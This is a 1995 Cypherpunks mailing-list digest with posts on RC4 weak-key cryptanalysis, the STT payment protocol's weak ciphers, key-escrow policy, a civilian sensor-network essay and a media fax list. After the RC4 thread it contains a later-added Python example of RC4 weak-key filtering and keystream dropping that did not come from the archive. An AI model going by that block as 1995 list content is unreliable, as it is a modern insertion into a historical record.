From frissell at panix.com  Fri Sep 29 10:28:47 1995
From: frissell at panix.com (Duncan Frissell)
Date: Fri, 29 Sep 95 10:28:47 PDT
Subject: Info War Comes Home
Message-ID: <199509291728.NAA27408@panix.com>

[Note: Whenever I do one of my longer pieces, it seems to drop into the
void. Perhaps they are so well written and complete that no one can think
of any comment to make on them. Perhaps not. Read this one and comment.
You won't regret it.]

In honor of the Second Annual Conference on Information Warfare a few
weekends ago, here is my proposal towards a paper to be presented at next
year's conference.

*************************************************************************

The Mesh in the 'Hood

If any of you have not read every word of The Economist's Survey of
Defence Technology - "Softwar" in the June 10, 1995 issue --- shame on
you. Do so immediately. In that report, there is the following
description of the future battlefield without platforms (ships, aircraft,
armor). AKA the Mesh.

The Mesh is a network imposed over a landscape (what used to be called a
battlefield). The network of sensors, smart munitions, small attack
modules, and perhaps human troops, shares information and kills enemies
moving through it. Friendly forces travel through it as if it weren't
there.
It is "flat." Hills and valleys disappear and expensive platforms [tanks,
helicopters, etc.] have nowhere to hide since it is co-extensive with the
whole territory it covers. It is also tough because it is hard to destroy
enough parts of it to make a difference. Nuclear munitions might destroy a
Mesh or imposing a stronger Mesh over an existing one might work if you
didn't mind wholesale destruction but defeating it without massive
destruction is hard.

To quote from the Survey:

"The mesh has a number of advantages. It is hard to attack, because its
strength is spread widely. It is hard to damage, because there are so many
communication paths. Many small sensors can provide a better picture than
a few large ones. More sensors allow the information domain to conform
more closely to the physical terrain. At the moment line-of-sight
detection by sensors in a widespread network leaves topographical blind
spots--wadis, narrow valleys--in which platforms such as attack
helicopters can lurk."

"While nets may see through the fog of war, meshes also tackle another of
the problems von Clausewitz identified; war's friction. The mesh is a war
machine with almost no moving parts, save the actual warheads of the
weapons. It is a solid-state device; its mechanisms have migrated far into
the spectral dimension of information, leaving only a thin skeleton
framework in the world of height, breadth and depth."

It certainly makes for a challenging war environment.

The Mesh is created by warriors to effectively serve warriors' ends. I
would like to suggest the possibility that civilians might create their
own Mesh to serve their ends.

A Mesh is Just a Net with Attitude

The Internet is (as we all know) a network of interconnected computers
that cooperate to exchange information in a standardized fashion. Its
purpose is communication. If its purpose is extended, it can become a
Mesh.
Assume that the Net has grown in size and importance so that a
significant portion of the population in a given geographic area is fully
wired --- hardly a dramatic assumption. All of those machines are
cooperating to enable the various sorts of communications that people
want to use the Net for. Some of those machines are already connected to
external cameras to do "silly" things like put pictures of Stockholm on
the WWW. What if people connected other things to the Net?

While it is unlikely that most people will put a chain gun in the window
and interface it with the Net anytime soon, other useful connections are
possible. [And even in the case of weaponry, specific neighborhoods might
be interested in doing creative things now. Thus Bo Gritz' heavily armed,
Patriot, Recreational Subdivision in Idaho might find a use for the Mesh.
And won't those Black Helicopters be surprised.]

More peaceful civilians might deploy a Mesh to protect themselves against
bad people whether official or unofficial. Like the existing Speedtrap
website (http://www.nashville.net/speedtrap/) but in real time, cameras
and passive sensors could track the minions of the State as they cruise
through neighborhoods. They could also multicast live, full color, and
audio images of arrests and less formal interactions with the
authorities. Fans of Robert Heinlein will recall that Jubal Harshaw used
a version of this strategy in "Stranger in a Strange Land." Cops behave
better when they are on camera (and know it.) The Net allows everyone to
play.

END OF PART I (More next week).

From tcmay at got.net  Fri Sep 29 10:35:41 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 29 Sep 95 10:35:41 PDT
Subject: "Who shall speak for us?"
Message-ID: 

The questions "Who are the Cypherpunks?" and "Who shall speak for us?"
have come up several times, in different contexts:

-- Reporters want "human interest" stories for their other stories on
Netscape cracks, SSL challenges, arrests, executions, etc.
They want to know who we are, what our agenda is, what motivates us, and
who our spokesmen are.

-- "Who shall be our Spokesman?" keeps coming up. "Who shall speak for
us?"

-- There is once again talk about "getting organized" so as to better
compete with EPIC, EFF, CPSR, VTW, ACLU, etc. While no one is seriously
advocating a formal, dues-collecting organization, there is an
undercurrent of thought that we had better get more organized or we'll
just be roadkill on the information superduperhighway.

-- And there seems to be a sense of uneasiness amongst some of us that
there can't be a "Cypherpunks group" without organization, without
hierarchy.

In contrast, there have been points made that we are "nothing," not even
a group, and that we are only a set of mailing list subscribers. I think
this is too extreme a view, as we clearly have:

* some sense of membership in a group, some sense of cohesion, some sense
  of "Us" vs. "Them."

* regional activities in several parts of the U.S. and in some non-U.S.
  countries.

* a growing archive of postings, of knowledge gained through hard work.

So, we are _more_ than just the subscribers to a mailing list, but _less_
than a formal organization with shareholders, voters, elected officials,
and a Great Leader at the top.

What are we, then?

One parallel is to a bunch of folks who meet at a gathering spot, perhaps
a bar or pub. Perhaps a reading group, a book club. People who talk,
speculate, exchange theories, and even decide on things that some of them
will do. Maybe these folks, an ever-changing set of folks, will come to
some commonly-held viewpoints, though not held by all folks, and not
"voted on" to be the Official Position of this informal gathering of
folks at the local bar.

Cyberspace allows for all sorts of new kinds of "watering holes" where
such emergent, loosely-organized, anarchic groups may develop. These
"virtual communities" are an incredibly important development.
(My paper given at Imagina '95, in Monte Carlo, "Crypto Anarchy and
Virtual Communities," goes into this in detail.)

Another parallel is to what is sometimes called an "invisible college."
Academic researchers in a country or around the world form a loose kind
of invisible college, a network of people at various institutions that
share a common interest and that have certain emergent standards. Think
of the cryptology researchers, or the fusion researchers, of the world.

In this invisible college, reputations matter. Some researchers are more
esteemed than others, some play different roles than others. Some of them
are mostly teachers, others are buried deeply in their laboratories. And,
as with the informal pub gathering, this invisible college does not have
to "vote" on an official position, or "elect" leaders.

Ah, I hear some of you pointing out, "But in fact some of these invisible
colleges _do_ elect officials and _do_ have official positions!"

Indeed, many invisible colleges develop subsets that have formal
structures and become the de facto _professional guilds_ for their
organizations. The American Association of Chiropractic Examiners, the
French League of Graph Paper Experts, the Russian Federation of
Agriculturists, and on and on. (More seriously, the American Bar
Association, the American Medical Association, etc.)

Often these "professional organizations" are designed to extend the reach
of these organizations, to give official titles to the early organizers,
and to lobby governments for laws favorable to their members. Often these
formal organizations adopt licensing rules and regulations to "police
themselves" and also, in well-known cases of "public choice" theory and
"rent-seeking behavior," to limit the number of competitors. Often the
other hierarchies, such as the State itself, endorse the rules adopted by
the professional guilds.
(I'm not saying anyone is directly arguing that the Cypherpunks, not even
by innuendo, become a professional guild, but some of the clamoring about
how we need to adopt a less threatening or strange name, organize
ourselves more hierarchically, and present a more unified front is often
a step toward a rigid bureaucracy.)

It's been gratifying to me, at least, that the Cypherpunks group has not
fallen prey to this temptation, that in an important sense "we practice
what we preach." We claim to be an "anarchy," not a "hierarchy." While it
may be the case that each of us has his or her own personal hierarchical
ratings of others, it is important that we never have tried to formalize
or "vote on" these ratings. Or voted to elect a Great Leader.

Our strength is in our numbers and in our ideas, not in the guy we have
ensconced in an office in Washington so he can give press conferences and
sound bites for journalists. Our strength is in our multi-headed (dare I
mention "Medusa"?), multinational, informal lack of structure.

"But how will _We_ compete with the organizations that have Washington
offices? How will we get "air time" if we have no Spokespunk in
Washington, or no list of Official Spokespunks that journalists can call
to get The Cypherpunks Slant on things? Who shall speak for us?"

The answer is simple: Let no one claim to speak for "us." Let no one
claim to be a speaker for others. Let journalists adjust to a new way of
speaking, a nonhierarchical way of saying "I think" and "My view is." Let
journalists contact the people actually doing something they are writing
about. Let journalists call the people directly involved, not the
Official Spokespunks. It may be _easier_ for some journalists to simply
call the guy they always call, just to get a "reaction quote," but our
job is not to make it easier for some lazy journalists.

And let those who dislike the name "Cypherpunks" call themselves
something else. Nothing's stopping them.
Of course, it may be that the people wanting a more conservative, more
staid name also wish to "inherit" the mantle the Cypherpunks now have,
wish to convey to the "International Association of Cybernetic Privacy
Advocates," or whatever, the membership and reputation of the current and
past Cypherpunks. This, I think, is the "old way" of doing things, the
herd way.

If the views many of us have about anarchy and cyberspace are correct,
this way of operating represents the future. If not, who cares what we
think?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From bwern at jax.jaxnet.com  Fri Sep 29 11:02:11 1995
From: bwern at jax.jaxnet.com (Ben Wern)
Date: Fri, 29 Sep 95 11:02:11 PDT
Subject: HP Lobbies for Exportable Crypto
Message-ID: <199509291809.OAA13405@jax.jaxnet.com>

>From the 28th of September's EDUPAGE:

HP LOBBIES FOR EXPORTABLE ENCRYPTION PLAN

Hewlett-Packard has developed an encryption strategy with the French
company Gemplus SCA that they're hoping will pass the tough scrutiny of
U.S. export controllers. The plan takes a two-pronged approach -- an
"encryption engine" that works in conjunction with a code-making formula
that can be adjusted to any level deemed acceptable by the U.S.
government, and a policy card that would be reviewed on a case-by-case
basis by the State Department. The flexible system is designed to adapt
to changing government policies, and could even accommodate a key escrow
system like the Clipper chip. "There was a lot of skepticism when HP
first proposed it.
But it looks to me that they are well on the way to the next step," says
a former encryption specialist at the National Institute of Standards and
Technology. (Wall Street Journal 27 Sep 95 B7)

Ben Wern
bwern at jaxnet.com | bwern at pathtech.com | bwern at unf.edu
SAY NO TO TALKING COWS!
-------------------------------------------------------------------------
"We are more than the sum of our knowledge, we are the products of our
imagination."

From hallam at w3.org  Fri Sep 29 11:41:12 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 29 Sep 95 11:41:12 PDT
Subject: Netscape & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509290659.XAA09185@ix7.ix.netcom.com>
Message-ID: <9509291841.AA29412@zorch.w3.org>

>I for one am against any kind of GAK on moral grounds. I also think
>that trying to implement mandatory GAK in a software only system
>would be a nightmare.

If people care to look at my very old Shen work they will see a key
escrow facility. This was installed because as a network administrator at
a sensitive site.

I'm a big fan of key escrow. I just don't think I should be forced to use
it on a public network by a government. I need the ability to secure
internal channels inside certain sites however. I don't think I want the
White House running with each staffer providing their own personal
encryption system.

Phill.

From AndrewR at beetle.vironix.co.za  Fri Sep 29 12:00:13 1995
From: AndrewR at beetle.vironix.co.za (Andrew Roos)
Date: Fri, 29 Sep 95 12:00:13 PDT
Subject: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <306C426E@beetle.vironix.co.za>

Hi Bill

You could check for the full three-byte prefix, which further reduces the
number of keys you have to discard. Although all keys beginning "00 00"
are weak in the sense of my original post, they do not appear to be as
exploitable as the prefixes which generate two-byte probable sequences.
I also recommend generating and discarding some initial sequence bytes,
since the generation process mixes up the state table further. An extra
"round" through the state table (i.e. generating 256 bytes) _appears_ to
confuse things significantly, since by the time you've generated the
initial state table from the key, Index Y is a function of all bytes of
the key, so the second time around it's hard to figure out the impact of
the byte swaps. But I wouldn't trust this without a significant amount
of analysis: as always in this field, appearances can be dangerously
deceptive.

Of course, this defense is not possible with protocols like SSL where you
have to follow the spec - or better still, PCT which conveniently moves
the MAC to the *end* of the record, exposing the initial stream...

Andrew

----------
From: stewarts[SMTP:stewarts at ix.netcom.com]
Sent: 29 September 1995 10:16
To: Andrew Roos
Cc: cypherpunks
Subject: Re: Cryptanalysis of RC4 - Preliminary Results (Repeat)

It sounds like any application using RC4 with random session keys
should start by testing session keys and rejecting any that start with
00 00 or 03 FD; it means doing 2**-15 more random key generations,
and reducing the brute-force space by 2**-15, but it's a pretty small
reduction.

________________________________________________________________
Andrew Roos // C++ programmers have class (but not much inheritance)
PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos

From stewarts at ix.netcom.com  Fri Sep 29 12:02:48 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 29 Sep 95 12:02:48 PDT
Subject: VISA and Microsoft STT Specs available
Message-ID: <199509291902.MAA23808@ix8.ix.netcom.com>

At 11:10 AM 9/29/95 -0400, Phill wrote:
>Yes, VISA put the ASCII on their site...
>We only host the ps version.

Thanks!
I looked at the Visa site, and it has a usable form of the documents
still under construction; I waded through the 73-separate-page HTML
version for a while.... There's some good intro material on how you use
the stuff and who's responsible for what.

Microsoft has the technical specs as one big slightly-HTMLized text file
under http://www.windows.microsoft.com/windows/ie/stt.htm ; it's _much_
more readable, and has a pointer to the Visa version. (It's one big
with a few and hrefs, in black-on-white.)

Some cryptographic high points, from a brief scan.
- 1024-bit RSA signatures, using PKCS#1 format.
- SHA 160-bit hashes
- Symmetric bulk crypto includes two options (I haven't yet seen
  how you choose between them; I assume it's export/domestic?)
  == RC4/64 with 24 bits of salt leaving 40 bits of real key
  == DES-CBC - yes, that's single-DES.  IV=0.
#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
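The two mitigations discussed in the RC4 thread above, Bill Stewart's idea of rejecting session keys that start with a weak prefix and Andrew Roos's suggestion of generating and discarding the first 256 keystream bytes, as an added worked example that is not code from either post. It contains a textbook RC4 implementation, a check for the two three-byte prefixes Roos reported, a session-key generator that rejects such keys, and a measurement routine that shows how often each prefix leaks its two-byte keystream signature and that the bias disappears once 256 bytes are dropped. The sampled keys are constructed here with a seeded generator; the function names, the 8-byte key length and the 1500-key sample size are this example's own choices, not anything from the posts.

```python
"""RC4 weak-key prefix filter and keystream drop (added example, not from the thread)."""
import random

# Three-byte key prefixes reported as weak in the thread, mapped to the
# two-byte keystream prefix each one tends to produce.
WEAK_PREFIXES = {
    bytes([0x00, 0x00, 0xFD]): bytes([0x00, 0x00]),
    bytes([0x03, 0xFD, 0xFC]): bytes([0xFF, 0x03]),
}

# Initial keystream bytes to discard: one full pass over the 256-entry table.
DROP = 256


def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: build the 256-entry state permutation."""
    if not key:
        raise ValueError("key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(key: bytes, n: int, drop: int = 0):
    """Yield n keystream bytes, after silently discarding the first `drop` bytes."""
    s = rc4_ksa(key)
    i = j = 0
    for k in range(drop + n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out = s[(s[i] + s[j]) & 0xFF]
        if k >= drop:
            yield out


def rc4_crypt(key: bytes, data: bytes, drop: int = 0) -> bytes:
    """XOR data with the keystream; the same call encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, rc4_keystream(key, len(data), drop)))


def is_weak_key(key: bytes) -> bool:
    """True if the key begins with one of the reported weak three-byte prefixes."""
    return any(key.startswith(p) for p in WEAK_PREFIXES)


def generate_session_key(length: int = 16, rng=random.SystemRandom()) -> bytes:
    """Draw random keys until one passes the weak-prefix filter."""
    while True:
        key = bytes(rng.randrange(256) for _ in range(length))
        if not is_weak_key(key):
            return key


def leak_rate(prefix: bytes, expected: bytes, samples: int = 1500, drop: int = 0) -> float:
    """Fraction of sampled keys with `prefix` whose keystream starts with `expected`.

    Keys are 8 bytes long (an assumption of this example); the trailing bytes
    come from a fixed-seed PRNG so the constructed sample is repeatable.
    """
    rng = random.Random(1995)  # constructed, deterministic sample
    hits = 0
    for _ in range(samples):
        key = prefix + bytes(rng.randrange(256) for _ in range(8 - len(prefix)))
        if bytes(rc4_keystream(key, len(expected), drop)) == expected:
            hits += 1
    return hits / samples


if __name__ == "__main__":
    for p, e in WEAK_PREFIXES.items():
        print(f"prefix {p.hex()} -> keystream starts {e.hex()}: "
              f"{leak_rate(p, e):.1%} raw, {leak_rate(p, e, drop=DROP):.1%} after drop")
    print("fresh session key passes filter:", not is_weak_key(generate_session_key()))
```

The filter checks the full three-byte prefix, as Roos suggests, so it discards far fewer keys than a two-byte check would. The keystream drop is the stronger measure, but, as Roos also notes, it is only available where the protocol lets you choose the keystream offset; a fixed-spec stream such as SSL's cannot use it, which is why the key filter is still worth having on its own.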






From carolann at censored.org  Fri Sep 29 12:11:22 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Fri, 29 Sep 95 12:11:22 PDT
Subject: This fax list is 95% accurate!
Message-ID: <199509291911.MAA13112@usr1.primenet.com>


Sorry the whole HTML is here,
however, if you now want to 
make "A CYPHERPUNK SPEAKS....."
Press Release, this fax list 
will do it for you, only two
or three numbers are unverified!
(and that's as of today!)






Fearless Fax Numbers Revised 9-29-95


Transgender Lobby Days Website


I promised last week that I would send this out when the idea of a
blanket-fax-campaign for a c-punks press release was being discussed.
Sorry it took me so long to get around to it, but here it is.
I was mistaken in my original posting:  it includes neither the Fox Network
_nor_ the Eye on America show, but I'm sure we'll find those numbers
somewhere.

I got it from the Iron Feather Journal, volume 14.  I have no reason to
believe that any of these numbers are incorrect, but some of them may
have changed.

Also:  personal apologies to anyone who considers this to be noise.  Please
restrict all flames to private e-mail.

Anybody wanna fax Ted Turner?  :)

ABC 20/20	    NY			1-212-456-2969
Ann Arbor News	    Ann Arbor, MI	1-313-994-6879
AP		    Los Angeles		1-213-748-1200
AP		    San Diego		1-619-291-2098
AP (Broadcast)      Washington, D.C.    1-202-955-7367
Associated Press    Los Angeles         1-213-748-9836  Steve Loeper
Associated Press    Phoenix, AZ 	1-602-254-9573  Assignment Editor
Associated Press    San Francisco	1-415-552-9430  Bill Schiffmann
Associated Press MN Minneapolis, MN	1-612-332-4245
Boston Phoenix	    Boston, MA		1-617-536-1463
Boulder Daily Camera Boulder, CO	1-303-442-1508
C-SPAN		    Washington, D.C.    1-202-737-6226  Sarah Traheorn
CBS		    Washington, D.C.    1-202-659-2586
CBS (Radio)	    Washington, D.C.    1-202-659-5578
CBS Eve News	    NY			1-212-975-2115
CBS Morning	    Washington, D.C.    1-202-331-1765
CBS News	    Los Angeles		1-213-651-0285  Jennifer Siebens
CBS News	    San Francisco	1-415-362-7417  John Blackstone
CBS TV		    Los Angeles		1-213-651-0321
CBS TV 		    San Francisco	1-415-362-7417
Chicago Sun-Times   Chicago, IL    	1-312-321-3084
Chicago Tribune     Chicago, IL		1-312-222-3143
CNN		    San Francisco       1-415-398-4049
CNN President	    Atlanta, GA		1-404-827-1575  Ted Turner
Coloradoan	    Fort Collins, CO	1-303-224-7726
Denver Post	    Denver, CO		1-303-820-1369
Der Spiegel	    Hollywood, CA	1-213-851-9867  Frances Schoenberg
Detroit News	    Detroit, MI		1-313-222-2335
ESPN		    Bristol CT		1-800-592-3776
Gannett	  	    Washington, D.C.	1-202-243-0190
Gannett News Service Sacramento, CA	1-916-446-7326  Becky Lavally
KFAN AM	     Minneapolis		1-612-820-4265
Kostabi Media		New York	1-212-925-3055
Mother Jones	    San Francisco, CA	1-415-863-5136  Douglas Foster
NBC		    Washington, D.C.	1-202-362-2009
NBC News	    Burbank, CA		1-818-840-4275  Heather Allan
NBC News President New York NY	1-212-315-4037
NBC TV	  	    Los Angeles		1-818-840-4275
Newsweek	    Washington, D.C. 	1-202-783-6512
NPR Radio	    San Francisco, CA	1-415-553-2241
NY Times	    New York, NY	1-212-556-4603
PBS		    Alexandria, VA	1-703-739-0775
Pulse! 		    West Sacramento, CA 1-916-373-2480  Laurie Macintosh
Rainbow Coalition   Washington, D.C. 	1-202-728-1192
Reuters             Los Angeles		1-213-622-0056
Rocky Mountain News Denver, CO		1-303-892-5499
Scripps Howard	    Washington, D.C.	1-202-408-8116
Shareware Magazine  Sunnyvale, CA	1-602-839-2872  Tracy Stephenson
Sports Fan Radio Net  Las Vegas NV      1-702-737-1906
Time	 	    San Francisco, CA	1-415-434-5209  Paul Witteman
Time Magazine	    NY			1-212-522-0451
UPI		    Boston, MA		1-617-338-9774  Barry Fly
UPI		    Los Angeles		1-213-620-1237
UPI		    San Francisco	1-415-552-3585  Bill Bucy
UPI		    Seattle, WA		1-206-283-0408  Penny Spar
UPI		    Washington, D.C.    1-202-789-2362
UPI (Radio)	    Washington, D.C.    1-202-842-3625
US News & Wrld Rprt Washington, D.C.    1-202-955-2713
USA Today	    Washington, D.C.	1-202-955-2049
Utne Reader	    Minneapolis, MN	1-612-338-6043
Whole Earth Review  Sausalito, CA	1-415-332-2416  Kevin Kelly


kelli at zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)>
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams

carolann at censored.org -- Member Internet Society - Certified BETSI Programmer - Webmistress
Carol Anne Braddock (cab8)   carolann at censored.org   206.42.112.96
My Homepage: The Cyberdoc
http://dcs.ex.ac.uk/~aba/export/


From somogyi at digmedia.com Fri Sep 29 12:34:44 1995
From: somogyi at digmedia.com (Stephan Somogyi)
Date: Fri, 29 Sep 95 12:34:44 PDT
Subject: STT is 40-bit for RC4, 56-bit for DES
Message-ID: 

From the STT spec, page 73:

6.8 CRYPTOGRAPHY

A. Encryption

Two bulk encryption algorithms are used in STT - RC4 and DES.

1. STT uses RC4 encryption with 8-byte keys, of which 3 bytes are salt, in the clear. See the RC4Key entry under the Low Level Composites sub-section of this document. RC4 is a stream cipher; there are no pad bytes and the encrypted data is the same size as the plaintext data.

2. STT uses the Cipher Block Chaining (CBC) mode of DES, as defined in Federal Information Processing Standard FIPS 81. The key is 8 bytes long, with each byte having a parity bit in position 0. Thus there are 56 bits of random key. STT uses an all-zero byte Initialization Vector (IV). A maximum of 8 bytes of padding is applied to every plaintext message encrypted with DES to pad the message to a length that is a multiple of 8 bytes. Pad bytes have a value of x = 8 - ((length of the plaintext) mod 8) and the number of pad bytes is also x. For example, if the plaintext message was 17 bytes long, then each of the 7 bytes of padding contains the value 0x07. If x is 0, then there are 8 bytes, each containing 0x08. Padding is appended to the end of the plaintext before encryption and is stripped off after decryption.

B. Signatures

STT uses PKCS #1 Encryption block formatting for RSA signatures. Total length is 128 bytes for the signature (1024-bit modulus). The following is the plaintext:

  (TLV_SIGNATURE
    (BYTE[20] HashOfData)   ;Hash of the data being signed
    (BYTE 0)                ;parser initializer
    (BYTE[105] 0xff)        ;padding
    (BYTE 0x01)             ;recom. for private key encryptions
    (BYTE 0))               ;overflow protection for RSA

C. Hashing

All hashes in STT are 20-byte SHA hashes. See Federal Information Processing Standards FIPS 181 for the specification of SHA hashes.

________________________________________________________________________
Stephan Somogyi
Mr Gyroscope
Digital Media


From dmandl at panix.com Fri Sep 29 12:37:11 1995
From: dmandl at panix.com (dmandl at panix.com)
Date: Fri, 29 Sep 95 12:37:11 PDT
Subject: Info War Comes Home
In-Reply-To: <199509291728.NAA27408@panix.com>
Message-ID: 

On Fri, 29 Sep 1995, Duncan Frissell wrote:

> [Note: Whenever I do one of my longer pieces, it seems to drop into the
> void. Perhaps they are so well written and complete that no one can think
> of any comment to make on them. Perhaps not. Read this one and comment.
> You won't regret it.]
>
> In honor of the Second Annual Conference on Information Warfare a few
> weekends ago, here is my proposal towards a paper to be presented at next
> year's conference.

A couple of things jump to mind:

Though I know you only used War as a metaphor, even that rubs me the wrong way. I don't like wars or people who fight them--namely States, bullies (BIG bullies), and other Territorial Gangsters. It's an authoritarian, hierarchical model, even though I realize you're using it loosely. Your piece is very short on details, but the few you give all employ the War metaphor: "neighborhood defense," sensors, video cameras, etc. I have no problem with some of these things per se, especially if they're targeted against the State, but I also have no interest in living in a kind of permanent war zone.

This strikes me as a negative approach versus the more positive approach of, say, mutual assistance groups like the "tong." (Hakim Bey wrote an excellent essay on tongs and their applicability to modern anarchist groups, btw. If anyone's interested, send me an email message with subject "TONG PLEASE" and it'll be sent to you automatically.)

Anyone attracted by the idea of urban warfare should read Mike Davis's excellent "City of Quartz." He's talking about the modern city (specifically, L.A.) as a war zone pitting _haves against have-nots,_ but the idea is the same, and it's scary as hell.

I'm ambivalent, to say the least, about the mania for getting everything in the world WIRED, but if you want to convince me you'll have to come up with a model that offers me something _constructive._

Cheers.

--Dave.

--
Dave Mandl
dmandl at panix.com
http://wfmu.org/~davem


From buescher at lust.ugcs.caltech.edu Fri Sep 29 12:49:05 1995
From: buescher at lust.ugcs.caltech.edu (Brent Buescher)
Date: Fri, 29 Sep 95 12:49:05 PDT
Subject: "Who shall speak for us?"
In-Reply-To: 
Message-ID: <44hiiv$s2h@gap.cco.caltech.edu>

Is there a charter for the mailing list? Some kind of broad position paper and possibly a history of "exploits" would be helpful for the typical mediadroid. Also, maybe the thing to do is to point media types who want spokespeople in the direction of the EFF.

I have a good friend that's a reporter for a local TV station, and when you realize how much pressure these guys are under to get a complete story in a handful of hours and condense it down into one minute of something that's interesting to Joe Sixpack, it's easy to understand how the mass media messes up anything vaguely technical or not easily understood in terms of people's preconceived ideas (prejudices).

Brent


From dl at hplyot.obspm.fr Fri Sep 29 13:54:37 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 29 Sep 95 13:54:37 PDT
Subject: Anon Http web Proxy V2.1
In-Reply-To: <9509281922.AA18715@hplyot.obspm.fr>
Message-ID: <9509292054.AA24798@hplyot.obspm.fr>

> I fixed the IOs, it now works a lot faster, play with it on
> http://hplyot.obspm.fr:6661/ (no abuse plz)
> and get the source package on
> [old now invalid url deleted]

Ok, I updated my tclbin thing to include the unbuffered IO change, and I've added everything you need to build the shell, as well as the proxy source itself, in the latest tclbin release:

ftp://hplyot.obspm.fr/tcl/tclbin-0.5.tgz

I wonder if anyone is interested?

ps: I received today the rsa/amno shirts I've ordered from Adam, they *rock*, well designed, very good quality,... a must! See http://www.dcs.ex.ac.uk/~aba/uk-shirt.html {no i don't earn a buck for advertising :-)}

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

terrorist strategic South Africa munitions Nazi jihad Marxist


From trei at process.com Fri Sep 29 14:02:13 1995
From: trei at process.com (Peter Trei)
Date: Fri, 29 Sep 95 14:02:13 PDT
Subject: (Fwd) Internet Euro-Clipper
Message-ID: <9509292102.AA10120@toad.com>

------- Forwarded Message Follows -------

From Risks Digest, via www-buyinfo
============================================
F Y I from the RISKS DIGEST-----------

Date: 20 Sep 1995 12:24:10 GMT
From: rja14 at cl.cam.ac.uk (Ross Anderson)
Subject: European Governments Agree to Ban Strong Crypto

According to an article in `Communications Week International', the 34-nation Council of Europe has agreed to outlaw strong encryption products which do not make keys available to governments.

The article, `Euro-Clipper chip scheme proposed', is on the front page of the magazine's issue 151, dated 18th September, which arrived in my mail this morning. It relates that the policy was approved on the 8th September at Strasbourg by the Council, and coincides with an attempt by the European Commission to propose a pan-European encryption standard.

The Council - unlike the Commission - has no statutory powers to enforce its recommendations. However, Peter Csonka, the chairman of the committee that drafted the document (and an administrative officer at the Council's division of crime problems) says that `it is rare for countries to reject Council of Europe recommendations'.

The proposal would make telecomms operators responsible for decrypting traffic and supplying it to governments when asked. It would also `change national laws to enable judicial authorities to chase hackers across borders'.

Opposition to this measure was expressed by Mike Strezbek, VP responsible for European telecomms at JP Morgan, who said that his organisation `will challenge any attempt to limit the power of our network encryption technologies very strongly'.

Csonka said that the Council had given consideration to business interests but had tried to strike a balance between privacy and justice. However, `it remains possible that cryptography is available to the public which cannot be deciphered,' his document says. `This might lead to the conclusion to put restrictions on the possession, distribution, or use of cryptography.'

Apparently another international organisation, the OECD, has called a conference of its members in December to devise a strategy on encryption.

I for one will be making clear to my MP that his stand on this issue will determine how I cast my ballot at the next election. I note that John Major stated in a 1994 parliamentary written reply to David Shaw MP that the government did not intend to legislate on data encryption. I am disappointed that government policy has changed to the point of supporting the Council of Europe, and that this change has sneaked through during the parliamentary recess.

Ross Anderson

Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com


From lethin at ai.mit.edu Fri Sep 29 14:07:33 1995
From: lethin at ai.mit.edu (Rich Lethin)
Date: Fri, 29 Sep 95 14:07:33 PDT
Subject: SOFTWARE: Filtering ads out of popular web sites
Message-ID: <199509292107.RAA25904@grape-nuts.ai.mit.edu>

On the subject of HTTP proxies,

[SEVERAL FWD'S DELETED, ENTERTAINING SUBJECTS RETAINED]

- - - Begin forwarded message - - -

Subject: The agents/advertising arms race heats up
Subject: OH YEAH BABY, FILTER ME HARDER

>From: Axel Boldt
>Newsgroups: comp.infosystems.www.announce
>Subject: SOFTWARE: Filtering ads out of popular web sites
>Organization: Univ of California at Santa Barbara, Dept of Mathematics
>Approved: www-announce at boutell.com
>Message-ID: <44ercn$nhl at holly.aa.net>

Several popular web sites have recently turned to putting advertising gifs on their pages. NoShit is a tool that filters these out so that you don't see them - in fact, you don't even download them in the first place, thus saving time, money and brain capacity.

NoShit is implemented as a set of patches against Cern httpd to turn it into a "filtering proxy server". This means that the proxy maintains a list of URL templates together with corresponding filter scripts. When a document is requested from the proxy that matches one of the templates, then the page is piped through the corresponding script before being presented to the client. This works together with caching, if desired.

The idea is to run your own personalized NoShit proxy server and point your browser to it. The proxy does the filtering; the browser doesn't even know about it. This scheme works with every browser.
I have written a ready-to-use library of filter scripts for a couple of well known, ad-infected sites, including Yahoo, Lycos, Netscape, HotWired, CNN, Infoseek and NandO Times. You can change these or add your own very easily.

Locations: (Germany) (California)

Enjoy,
Axel

- - - End forwarded message - - -


From jim at acm.org Fri Sep 29 15:26:06 1995
From: jim at acm.org (Jim Gillogly)
Date: Fri, 29 Sep 95 15:26:06 PDT
Subject: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: 
Message-ID: <199509292225.PAA25735@mycroft.rand.org>

> Doug Hughes writes:
